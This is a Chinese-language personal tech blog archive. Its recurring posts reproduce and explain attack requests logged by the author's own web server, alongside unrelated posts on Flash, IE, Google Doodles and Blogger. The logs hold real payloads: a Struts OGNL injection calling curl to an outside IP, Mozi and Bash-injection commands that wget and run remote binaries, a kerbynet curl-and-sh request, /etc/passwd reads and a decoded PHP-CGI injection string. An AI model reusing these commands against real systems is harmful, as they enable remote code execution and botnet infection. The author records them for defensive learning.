從 Web Log 學習系統漏洞 68

很久沒寫weblog的東西了, 大部分都是phpMyAdmin、WordPress或NAS的漏洞攻擊, 這幾天看到了一個有趣的東西, 它居然是可以正常access的:

45.146.164.15 - - [22/Dec/2020:14:20:40 +0800] "GET /?id=%25%7B%28%27Powered_by_Unicode_Potats0%2Cenjoy_it%27%29.%28%23UnicodeSec+%3D+%23application%5B%27org.apache.tomcat.InstanceManager%27%5D%29.%28%23potats0%3D%23UnicodeSec.newInstance%28%27org.apache.commons.collections.BeanMap%27%29%29.%28%23stackvalue%3D%23attr%5B%27struts.valueStack%27%5D%29.%28%23potats0.setBean%28%23stackvalue%29%29.%28%23context%3D%23potats0.get%28%27context%27%29%29.%28%23potats0.setBean%28%23context%29%29.%28%23sm%3D%23potats0.get%28%27memberAccess%27%29%29.%28%23emptySet%3D%23UnicodeSec.newInstance%28%27java.util.HashSet%27%29%29.%28%23potats0.setBean%28%23sm%29%29.%28%23potats0.put%28%27excludedClasses%27%2C%23emptySet%29%29.%28%23potats0.put%28%27excludedPackageNames%27%2C%23emptySet%29%29.%28%23exec%3D%23UnicodeSec.newInstance%28%27freemarker.template.utility.Execute%27%29%29.%28%23cmd%3D%7B%27curl+93.189.44.137%2Fssa%27%7D%29.%28%23res%3D%23exec.exec%28%23cmd%29%29%7D HTTP/1.1" 200 1833 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

Google 全球大當機

工程師又出現了 😆

再見了 Flash Player

Adobe 官方說明

Adobe 將在2020年12月31日之後不再支援 Flash Player, 不再對 Flash Player 提供任何安全更新, 也不再開放使用者下載.

Adobe Flash (前身為Macromedia Flash和Shockwave Flash, 簡稱Flash), 自從 Macromedia 公司於2005年12月3日被 Adobe 公司收購後, Flash 也就成為了 Adobe 旗下的軟體. Flash 之前是線上多媒體內容的主要平台, 應用於網際網路網頁的向量動畫檔案格式. 不過 Flash 也存在很多資安問題, 在網路上 google 一下「Flash 漏洞」就可以發現有不少資訊, 例如竊取使用者資料或是遠端程式碼執行攻擊等, 另外 Flash 也有消耗過多電腦資源的問題, 一些網頁上的 Flash 要使用高效能的電腦才能滿足其需求. 近年來, HTML5, WebGL 和 WebAssembly 之類的開放標準一直在不斷成熟, 並且可以作為 Flash 內容的可行替代方案, 所以一些瀏覽器業者也正在將這些開放標準整合至他們的瀏覽器中, 並漸漸放棄使用 Adobe Flash Player.

題外話, 記得當年 Macromedia 三大軟體: Deramweaver, Fireworks, Flash 正興起時, 還特地買了一本書來自我學習, 大概花了一個禮拜的時間邊學邊做出一個 Flash 動畫, 不過後來陸續有不少 Flash 小軟體的出現, 也有人分享 .fla 原始檔, 根本不用花太多時間就做好一個小動畫, 而那本書後來借了人之後就再也沒有回來過...

Google 發現 Windows 系統零日漏洞

Google 的資安團隊 Project Zero 於近日發現存在於 Windows 作業系統的「零日漏洞」, 受影響的系統包含 Windows 7 至 Windows10 等版本, 這個漏洞存在於 Windows 核心中加密驅動程式能使攻擊者獲得權限, 並發動遠端程式碼的惡意攻擊, Project Zero 團隊將它編號為 CVE-2020-17087

Project Zero 發布的 CVE-2020-17087

從 Web Log 學習系統漏洞 67

最近幾個月 web log 中非常多的這個記錄, 之前好像有類似的東西:

/index.php?s=/index/ hink

估狗之後是 ThinkPHP 的遠端命令執行漏洞, 早在好幾年前這漏洞就已經有這個問題, 不知為什麼到現在還一直出現, 不過我沒使用 ThinkPHP 所以不需要擔心, 只是來源 IP 不定比較難擋掉

解決Blogger網誌無法在文章中顯示廣告問題

在這幾天的測試中, 不小心就把原本無法在文章中顯示廣告的問題解決了, 大概知道 blogger 版面設定的技巧 😆

1. 在主題設定中, 自訂設定的選項中, 如果有編輯過HTML並儲存後

2. 在版面配置的主版面設定中, 在文章之間顯示廣告的選項會被自動取消, 沒關係, 先在未勾選的狀態下儲存設定, 然後再去重新勾選及設定, 同時也要檢查有沒有多的 Google Ads 小工具自動跑出來, 有的話就刪除

3. 前面步驟完成後, 再去前台重新整理網誌首頁, 每3篇網誌之後就有出現廣告了

解決Blogger手機版網頁版面問題

之前說到版面主題修改之後手機版網頁變成電腦版網頁, 後來知道問題所在(太久沒去修改版面主題忘了要去改設定), 要去修改行動裝置設定

新版Blogger的一些問題

快被這個新版的Blogger管理模式給搞瘋, Blogger之前更新後有些問題, 回報之後有些有改善有些沒有, 像是發布時間的設定或是上傳圖片後圖片被縮小了, 反應之後都有改善, 而有些版面主題模組在更新之後有些功能反而無法使用, 例如在文章間顯示廣告的功能, 不管我設定勾選並儲存之後, 它又自動變成未勾選, 所以現在文章之間都無法再顯示廣告, 本以為是版面主題的問題, 於是切換不同的版面主題試試, 發現有的可以顯示有的卻不行, 算了, 反正放廣告只是放好玩的, 但是之後又發現手機版的網頁居然不是之前的手機版的網頁模式, 而是變成電腦版的網頁模式, 不曉得哪個CSS又失效了, 等有空再來看吧...

Deepfake

Deepfake深度偽造, 這是由兩個字詞所組成(deep learning 及 fake), 利用人工智慧的技術將一張人臉移植到影片中的人臉上,  因為最近的美國總統大選而又被討論起來, 這項技術早在1990年由學術機構的研究人員開始開發, 而在2017年後相關技術被廣泛使用, 例如臉部變換技術的App

Deepfake利用機器學習和人工智慧中的強大技術來操縱或生成具有極高欺騙潛力的影像和聲音內容, 例如美國前總統歐巴馬被造假的影片

引用 BBC News 影片

Deepfake技術其實也有好的地方, 例如套用到歷史人物或是電影特效上, 或是最近很流行的vTuber, 但是如果遭到惡意使用, 小則個人受到影響, 例如被套用到色情影片上, 大則政治、經濟甚至國家領導人被人惡意製造假影片產生國家動盪, 實在是很可怕的一件事

Google 22歲

 時間過得真快, 才記得沒多久前 Google 21歲

借用 Google 的圖

從 Web Log 學習系統漏洞 66

 weblog 中出現了這段記錄

185.234.217.231 - - [19/Sep/2020:18:40:37 +0800] "PUT /myjsp.jsp/ HTTP/1.1" 500 534 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36"
185.234.217.231 - - [19/Sep/2020:18:40:38 +0800] "PUT /myjsp.jsp/ HTTP/1.1" 500 534 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36"
185.234.217.231 - - [19/Sep/2020:18:40:38 +0800] "GET /myjsp.jsp HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36"
185.234.217.231 - - [19/Sep/2020:18:40:39 +0800] "PUT /myjsp.jsp/ HTTP/1.1" 500 534 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36"
185.234.217.231 - - [19/Sep/2020:18:40:39 +0800] "GET /myjsp.jsp HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36"
185.234.217.231 - - [19/Sep/2020:18:40:40 +0800] "PUT /myjsp.jsp/ HTTP/1.1" 500 534 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36"
185.234.217.231 - - [19/Sep/2020:18:40:40 +0800] "GET /etc/passwd HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36"

jsp 這東西是 tomcat 在用的, 不過我對 tomcat 沒研究, 只是這個 myjsp.jsp 的東西看起來像是初學者平常練習寫的程式, 不曉得跑來我這測試幹嘛? 接著最後的 /etc/passwd 擺明就是來偷資料的, 除了這個看起來是沒有危害的感覺

微軟詐騙信？

詐騙信收過不少, 但是做得這麼不專業的我都當笑話看

要冒充微軟居然用 outlook 的免費信箱帳號在寄信, 信中也沒使用微軟的企業Logo, 內文中獎人至少也要寫上我的名字吧, 一看就知道是亂槍打鳥

從 Web Log 學習系統漏洞 65

 weblog中出現這段記錄:

110.156.98.127 - - [22/Aug/2020:14:56:53 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 207 "-" "-"

利用其中的關鍵字 netgear.cfg 拿去餵狗, 得知這是一家美國的 NETGEAR 的網路路由器, 從它的動作來看大概是利用路由器的漏洞進行遠端指令執行, 去下載自身機器的 Mozi.m ?? 再執行自己的網頁 currentsetting.htm ?? 真搞不懂它在幹啥...

Windows 即將停止 Internet Explorer (IE) 支援

Microsoft Tech Community

微軟365於近日公布 Windows 將於 2020年11月30日停止 Internet Explorer (IE瀏覽器)的支援, 而在 2021年8月17日之後, 微軟則會在微軟365等服務終止支援 Internet Explorer 11 瀏覽器, 代表在 Windows 10 系統都將會以 Microsoft Edge 瀏覽器為主, 藉此逐漸淘汰 Internet Explorer 11 瀏覽器

微軟也計劃於 2021年3月9日停止舊版的 Microsoft Edge 支援, 舊版 Microsoft Edge 將不再接收安全更新, 而目前微軟也將現有的 Windows 10 用戶遷到以 Chromium 為基礎的新版 Microsoft Edge 瀏覽器

IE也終於到了這一天...

滑鼠發明創造人William English過世

當時的滑鼠, 截圖自維基百科

William English 維基百科

滑鼠發明人 William English 於 2020年7月26日過世

唉, 2020 年帶走了好多人

下面為1968年當時滑鼠展示影片

從 Web Log 學習系統漏洞 64

weblog 中出現了這段記錄:

52.250.105.66 - - [20/Jul/2020:23:02:41 +0800] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 225 "-" "-"
52.250.105.66 - - [20/Jul/2020:23:04:29 +0800] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 225 "-" "-"
52.250.105.66 - - [20/Jul/2020:23:04:35 +0800] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 225 "-" "-"
52.250.105.66 - - [20/Jul/2020:23:13:37 +0800] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 225 "-" "-"

微軟發布DNS Server重大RCE漏洞

最近微軟發布了一個 DNS Server重大 RCE 漏洞, 編號為 CVE-2020-1350, 這是一個已經存在17年的 DNS 元件漏洞, 可讓攻擊者遠端執行程式碼, 還能自主感染(wormable)其他機器, 主要發生在 Windows DNS Server 解析外部傳入的 DNS查詢以及針對轉送(forwarded)的 DNS查詢回應進行解析的過程中, 攻擊者可以發出惡意 DNS查詢, 藉此觸發記憶體緩衝溢位, 而讓攻擊者得到系統管理員權限執行任意程式碼, 進而控制伺服器, 風險評分達最高等級的10.0, 影響 2003 到 2019 年的所有 Windows Server 版本, 解決方式是下載安裝修補程式

CVE-2020-1350 | Windows DNS Server Remote Code Execution Vulnerability

從 Web Log 學習系統漏洞 63

weblog 中又一堆 phpmyadmin 的入侵記錄, 如果沒有把握管理的話最好還是不要使用

IP連進來後直接看到 Index目錄, 完全沒設防, 使用 Debian 系統

雖然 phpmyadmin 的 setup 目錄加密了, 但是應該很容易被破解, 才被人拿來當跳板

查了一下來源 IP, 來自 google 的雲端主機？

從 Web Log 學習系統漏洞 62

weblog 中出現這段 phpmyadmin 的入侵測試, 架站以來不斷地有類似的方式入侵, 雖然 phpmyadmin 是一種很好用的資料庫管理網頁工具, 但是似乎有漏洞, 特別是中國那邊某些 XAMPP 的架站套裝套件, 提醒大家如果使用要特別注意

49.216.189.217 - - [03/Jun/2020:14:18:01 +0800] "GET /phpMyAdmin/setup/ HTTP/1.1" 404 215 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
49.216.189.217 - - [03/Jun/2020:14:18:01 +0800] "GET /favicon.ico HTTP/1.1" 200 5174 "http://www.w-studio.idv.tw/phpMyAdmin/setup/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
(上段紅色處為將存取需求包在 Referer 裡)
49.216.189.217 - - [03/Jun/2020:14:18:21 +0800] "-" 408 - "-" "-"

台灣人民個資遭洩漏在暗網 !?

今天看到一篇新聞, 內容大概是說到一間名為 Cyble 的資安網站發布於暗網發現一個名為台灣全國房屋登記資料庫 (Taiwan Whole Country Home Registry DB) 的資料庫, 其中含有 2000萬筆以上的台灣人民個資, 資料庫檔案達3.5Gb (2000萬筆以上資料不就等於將近全部台灣人的資料了 !?), 這些資料是由一名叫 Todgod 的駭客於2019年流出，其資料來源為內政部戶政事務司全球資訊網, 如果是真的那真是太可怕了

稍微用關鍵字估狗了一下, 結果發現 PTT 上面一篇八卦, 看來要做晶片身分證還真是危險

Google Doodle 小遊戲-小精靈(PAC-MAN)

今天的 Google Doodle 小遊戲-小精靈(PAC-MAN)
小精靈遊戲30周年紀念

Google Doodle 小遊戲-嘻哈音樂

今天的 Google Doodle 小遊戲, 嘻哈音樂
這遊戲為了慶祝1973年8月11日嘻哈音樂發明了Break這種新音樂, 而衍伸出來的舞蹈稱為Breakdancing, 也就是大家所稱的霹靂舞

順帶一提, 上傳影片後又出現版權聲明通知, Youtube 真的很厲害

Google Doodle 小遊戲-2016 年萬聖節

今天的 Google Doodle 小遊戲, 回味 2016年的萬聖節遊戲

Google Doodle 小遊戲-墨西哥賓果

今天的 Google Doodle 小遊戲: 墨西哥賓果 Lotería

擷取自Google Doodle:

Lotería起源於15世紀的意大利, 傳達到西班牙後在1769年再傳到墨西哥, 規則類似於賓果遊戲, 玩家在桌子或木板上用標記(傳統上是使用生豆)註記, 待報牌員隨機拉出彩色插圖的卡作為指定的卡, 有時會即興創作與桌子上的空格匹配的詩意描述, 然後玩家在所有其他玩家之前完成規定標記時喊一聲“ Lotería”或“ Buenas”, 接著就能贏得比賽

Google Doodle 小遊戲-史高維爾

等了兩天 Google 終於又放上小遊戲, 該不會是去放勞動節吧 😆

關於史高維爾(擷自維基百科)：

威爾伯·林肯·史高維爾(Wilbur Lincoln Scoville)是一個美國藥劑師, 在1912年制訂測量辣椒素(Capsaicin)含量指標, 他以自己的姓「史高維爾」(Scoville)作為單位名稱, 稱為「史高維爾辣度單位」(Scoville Heat Unit), 簡稱為SHU

Google Doodle 小遊戲-花園地精

不知為何我的Google首頁今天一直沒有出現小遊戲, 只好用搜尋的方式叫出來

在製作 Google Doodle 小遊戲-洛克摩爾 Youtube 影片時遇到的版權問題

在製作 Google Doodle 小遊戲-洛克摩爾影片後, 上傳到 Youtube 時, 突然跳出一則版權聲明的訊息, 因為想要展示一下這個特雷門樂器, 臨時用了小星星(Twinkle, Twinkle)這個旋律, 沒想到現在 Youtube 的人工智慧這麼厲害, 我隨便彈出來的旋律居然能被精準鎖定, 不得不佩服 Google 的神奇, 只是沒想到連個人彈出的旋律結果也不一定擁有版權, 雖然我也沒有想拿此作營利, 但是被警示一下還是感覺怪怪的

Google Doodle 小遊戲-洛克摩爾

今天的Google Doodle小遊戲: 洛克摩爾
克拉拉·賴森貝格·洛克摩爾(Clara Reisenberg Rockmore)是古典小提琴神童,也是電子樂器特雷門(themin)的演奏家.
關於洛克摩爾(維基百科)

而這次Google Doodle小遊戲所要展示的是這個叫特雷門(themin)的樂器, 是1919年時由俄國發明家李昂·特雷門所發明的插電樂器, 是世界上最早的電子樂器之一.
維基百科: 特雷門

順帶一提, 對於沒有音樂細胞的我來說, 小星星已經是最大極限了😆

Google Doodle 小遊戲-費辛格

今天的Google Doodle 小遊戲: 費辛格, 一個音樂創作的小遊戲

Google Doodle 板球小遊戲

繼昨天之後, Google今天的小遊戲

Google Doodle 小遊戲-寫程式

Google今天首頁又有小遊戲, 不過這遊戲2017年就曾推出過, 今年為了紀念Google兒童程式語言LOGO創立50週年又推出這個小遊戲, 利用簡單有趣的方式讓兒童學習如何寫程式

Google Doodle 介紹

使用傳統打字機來當Linux的終端機(螢幕)

最近在網上看到這個有趣的影片, 用傳統打字機來當Linux的終端機(螢幕)

這個顯示(打字)速度會等很久吧 😆

WannaCry 的變種病毒 WannaRen 作者釋出解密金鑰

WannaRen病毒, 圖片來源:網路

之前測試過的 WannaCry 病毒, 最近出現它的變種 WannaRen, 但是又在最近這隻病毒的作者居然釋出了解密金鑰, 真讓人搞不清楚他的動機? 網路上可以搜尋到它的解密金鑰, 不曉得能不能用, 我就不放上來了

從 Web Log 學習系統漏洞 61

在 weblog 中看到這幾段紀錄, 之前就有遇過相同的東西:

182.61.165.46 - - [02/Apr/2020:12:37:46 +0800] "POST /cgi-bin/php?

182.61.165.46 - - [02/Apr/2020:12:37:50 +0800] "POST /cgi-bin/php-cgi?

182.61.165.46 - - [02/Apr/2020:12:37:50 +0800] "POST /cgi-bin/php.cgi?

182.61.165.46 - - [02/Apr/2020:12:37:50 +0800] "POST /cgi-bin/php4?

在?之後都接了一段編過的亂碼:

%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E

經過轉碼後得到以下內容:

-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n

問了一下大神之後得知, 這是利用 PHP 的漏洞來做遠端程式碼攻擊, 當 PHP 有 CGI 模式下使用時作用, 通過使用 auto_prepend_file 這個功能執行 PHP 代碼

史丹佛大學？

不知史丹佛大學為何對我網站有興趣, 最近幾個月一直發現到這組 IP 群連線, 搜尋了一下原來是史丹佛大學的網路研究, 因為也沒什麼危害也就放著不管它

171.67.70.85 - - [07/Apr/2020:14:02:51 +0800] "GET / HTTP/1.1" 200 210 "-" "Mozilla/5.0 zgrab/0.x"
171.67.70.85 - - [07/Apr/2020:14:02:54 +0800] "GET / HTTP/1.1" 200 210 "http://www.w-studio.idv.tw" "Mozilla/5.0 zgrab/0.x"
171.67.70.85 - - [07/Apr/2020:14:02:54 +0800] "GET / HTTP/1.1" 200 210 "http://www.w-studio.idv.tw" "Mozilla/5.0 zgrab/0.x"
171.67.70.85 - - [07/Apr/2020:14:02:55 +0800] "GET / HTTP/1.1" 200 210 "http://www.w-studio.idv.tw" "Mozilla/5.0 zgrab/0.x"
171.67.70.85 - - [07/Apr/2020:14:02:55 +0800] "GET / HTTP/1.1" 200 299 "http://www.w-studio.idv.tw" "Mozilla/5.0 zgrab/0.x"

台灣口罩實名制2.0-網路預購(改版)

明天開始台灣口罩實名制2.0-網路預購要進行第二輪的購買, 發現手機 APP 更新後也稍作修改, 操作介面更清楚

1. 登入後首頁直接可以看到口罩預購的圖示

w-studio.idv.tw
2. 點擊口罩預購之後, 有兩個按鈕, 一個是預購登錄, 一個是繳費查詢

微軟發布 Windows RCE遠端代碼執行漏洞 (ADV200006)

微軟於 3/23 發布2個重大遠端代碼執行漏洞 (RCE, Remote Code Execution)

這2個漏洞是在 Windows 內建的 Adobe Type Manager Library (ATMFD.dll) 元件中 (Adobe Type Manager Library 的功用是在 Windows 中顯示 Adobe Type 1 PostScript 字型), 漏洞是利用有害的字型檔案, 當用戶開啟檔案或在 Windows 內預覽字型時, 攻擊者可在Windows 上執行程式碼

影響範圍包括 Windows Server 2008、2012、2016 及 2019, 以及所有 Windows 10 版本與 Windows 7、Windows 8.1、Windows RT 8.1, 預計會在4月發布修補程式

現行微軟建議用戶關閉「檔案總管」中的預覽窗格及詳細內容窗格, 可防止檔案總管顯示 OpenType 字型, 或是關閉 WebClient 服務, 另外一種是重新命名 ATMFD.dll, 但這可能造成某些使用 OpenType 字型的應用程式無法運作, 不過 Windows 10-1709 以後的版本就沒有這個檔案了

台灣口罩實名制2.0-網路預購

今天最重要的事就是全民口罩購買上網啦, 解決那些因為上班上課無法去排隊購買口罩的人, 可以上網購買, 首先就是去安裝「全民健保行動快易通-健康存摺」這個APP到手機上

1. 開啟手機「全民健保行動快易通-健康存摺」這個APP

2. 首先首頁選擇「健康存摺」

從 Web Log 學習系統漏洞 60

web log 中出現一個白癡

180.123.121.41 - - [11/Mar/2020:12:31:24 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 302 297 "-" "Hello, world"

我的 IP 是 127.0.0.1, 快來 !

從 Web Log 學習系統漏洞 59

web log 中出現了這一段:

5.101.0.209 - - [02/Mar/2020:23:31:59 +0800] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 403 259 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

稍微問了一下估狗大神後得知, 這是一種利用 phpunit 進行遠端代碼執行的漏洞, phpunit 是一種在程式開發時使用的測試工具, 能夠利用它發送 post 請求執行php, 不適合放在網站伺服器的瀏覽端, 簡單的防堵方式就是把它刪除

wiki 中關於 phpunit 說明:

PHPUnit是用於PHP編程語言的單元測試框架, 它是xUnit體系結構的一個實例, 用於單元測試框架, 該框架起源於SUnit並在JUnit中流行, PHPUnit由Sebastian Bergmann創建, 其開發託管在GitHub上

發明「複製貼上」的傳奇工程師 Larry Tesler 逝世

發明「複製貼上」的傳奇工程師 Larry Tesler 逝世

勞倫斯·高登·泰斯勒 (Lawrence Gordon Tesler)，暱稱拉里·泰斯勒 (Larry Tesler)，生於美國紐約州紐約市，計算機科學家，主要研究領域為人機界面。1965年畢業於史丹佛大學並獲得了電腦科學學位。他在畢業後開始從事人工智能(AI) 研究，1973年進入Palo Alto研究中心(PARC)，隨後並在此發展出「複製、貼上、剪下」的功能概念

神通情人夢

腦中突然跳出了這首歌, 於是問了估狗大神.
在1984年的那個年代就能想出物聯網及AI的劇情真的是非常的前衛

從 Web Log 學習系統漏洞 58

幾個 xmlrpc.php 關鍵字出現在 log 中

148.72.232.156 - - [14/Feb/2020:21:02:04 +0800] "GET /xmlrpc.php HTTP/1.1" 404 210 "-" "PycURL/7.19.7"
50.62.176.85 - - [14/Feb/2020:23:00:08 +0800] "GET /xmlrpc.php HTTP/1.1" 404 210 "-" "PycURL/7.19.7"
148.72.232.156 - - [14/Feb/2020:23:08:03 +0800] "GET /xmlrpc.php HTTP/1.1" 404 210 "-" "PycURL/7.19.7"
107.180.121.48 - - [15/Feb/2020:10:08:12 +0800] "GET /xmlrpc.php HTTP/1.1" 404 210 "-" "PycURL/7.19.7"

估狗之後得知這是針對 WordPress 漏洞的 DDOS 攻擊, 這個 XML-RPC 是為了讓遠端能使用手機登入操作, 不過我沒有在用 WordPress 所以沒差

M.2 SSD硬碟規格及解唯讀

為了幫舊電腦原本 256Gb 硬碟升級容量, 買了一條 1Tb 的新硬碟, 沒多想這種 M.2 硬碟的規格有很多種就買了, 插入電腦內 BIOS 一直讀不到硬碟, 上網問了估狗大神之後才發現買錯規格, 原本電腦支援的是 M.2 SATA 規格, 新買的是 M.2 NVMe 規格, 而且當中還有分M key、B key 及 B+M key, 昏倒...

原來的256Gb硬碟, 那個 SATA 標誌鬼才看的到
(B+M key)

新買的1Tb硬碟, NVMe規格 (M key)

從 Web Log 學習系統漏洞 57

221.201.195.5 - - [21/Jan/2020:15:38:05 +0800] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 226
119.82.83.81 - - [21/Jan/2020:16:04:16 +0800] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 226
49.82.30.71 - - [21/Jan/2020:17:02:18 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 302 297 "-" "Hello, world"
88.247.131.12 - - [21/Jan/2020:17:06:52 +0800] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 226
180.156.40.119 - - [21/Jan/2020:18:18:37 +0800] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 226
93.42.75.233 - - [21/Jan/2020:18:24:50 +0800] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 226
105.184.139.121 - - [21/Jan/2020:19:10:27 +0800] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 226

最近很多這種莫名其妙的攻擊
估狗之後得知這是一種利用 Bash Shell 漏洞來進行遠端命令攻擊

wiki 中的 bashdoor 說明

從指令來看應該是專門針對 Linux 系統, 到指令中的 IP 去下載東西後再執行
查詢這 IP 91.92.66.124 是來自保加利亞
不曉得為什麼沒有被檢舉封鎖起來?
其中有一個蠻好笑的, 連線到 192.168.1.1 去下載? 還 Hello, world ? 是在哈囉?

從 Web Log 學習系統漏洞 56

昨晚來了一堆攻擊, 有幾段有趣的拿出來分享

從其中的關鍵字拿去估狗的結果, 發現一間國立大學某系網站有安裝這個編輯工具, 不曉得是不是這個編輯工具有漏洞所以被拿來做入侵測試? 順帶一提, 這國立大學網站的安全性不是做得很好, 因為 Index List 沒關所以被看光光

這個編輯工具能夠在瀏覽器上操作, 有興趣的可以自行搜尋

拿另外的關鍵字去餵狗搜尋到某一個奇怪的網站, 一樣也是沒關 Index List, 放了一堆空目錄, 但是每個裡面都有個JS檔

每個目錄裡面都有這個JS檔, 不曉得有什麼意義?